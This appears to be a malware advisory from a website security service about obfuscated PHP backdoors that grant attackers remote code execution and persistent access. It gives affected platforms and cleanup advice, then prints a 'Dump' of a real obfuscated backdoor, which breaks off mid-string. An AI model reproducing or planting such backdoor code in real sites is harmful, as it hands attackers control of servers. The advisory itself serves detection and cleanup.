Backdoors are pieces of code that allow attackers to bypass authentication, maintain their access to the server and reinfect files. Some of those malicious files can be as simple as a single line of code, allowing the execution of remote code, or complex algorithms, providing different functions to the attacker.
Malware creators are almost always trying to obfuscate their code to make the detection and analysis as difficulty as possible. One of such obfuscation methods is using big amount of non-ascii characters. This makes the code almost unreadable.
Affecting
Any PHP based web site (often through outdated WordPress, Joomla, osCommerce, Magento, Drupal and stolen passwords).
Cleanup
Cleanup is done by deleting the malicious file. Inspect your site's files for any sign of the code in the dump below.
You can also sign up with us and let our team remove the malware for you.
Dump
for($o=0,$e='&'()*+,-.:]^_`{|,,,|-((.(*,|)`)&(_(*,+)`(-(,+_(-(.(:(](^(_(`({)]+`+{+|,&-^-_(^)](](^(_(^(:(`(,-_(.-_(](:(,+_(-+_(--_(`(.(.+`+_(-(:(.(,+_(--^(.-_(:+{(]+{(:(:(^(`(,(,(,(.(:(:(:+{(,(_(:(_+_(-)](](,(:-_(,,&(_,&+_(-(`(:(.(,(.(.+_(-(.+`(,-_(.(`(](.(_-^(,)](:({(,(,(_(](.(](.-^(,(,(`(,(](:(.({(]-^+_(-(^+_(-(^(.(](,+`(`,&(:+{(.-^(_-_(`-_(]-^+_(-+{(:-^+_(--^(,(_(:(](,(_(`)](:,&(.(,+_(-+{+_(-+|(:(^(,(^(.+{+_(-({(,(^(^(,(_+_(-(_)](.(.(.(](,+_(-(,,&(^(`(`(^(]-^(,(.(,(.(:-_+_(-(^(_)](.(.(.(](,+_(-(,,&(:(^(,(^(.+{+_(-({(,(^(^(,(_+_(-(_)](:(^(.-^(,(_(_(](]+|(`(`(.(.+_(--^(,(.(:+{+_(-+`(`+_(-(:(`(:-_(,,&(,-_(.+{(,+_(-(:)](`+_(-(.+{(_+_(-(_+`+_(-)]+_(-(_(,(.(:(`(`)]+_(-,&(:+`+_(--^(.(.(`(_(,-^(:(`(](]+_(-,&+_(-)](^({(:-_+_(--_(:,&(,)](:-^(:-_(,(](.+{+_(-(_(,+`(:(](:(_(:(,(,-_(`+{(]-^(.(`(`-_+_(-(,(,(^(^-^+_(-(`(,+`(:(_(:+|+_(-({(`+{(],&(,(.(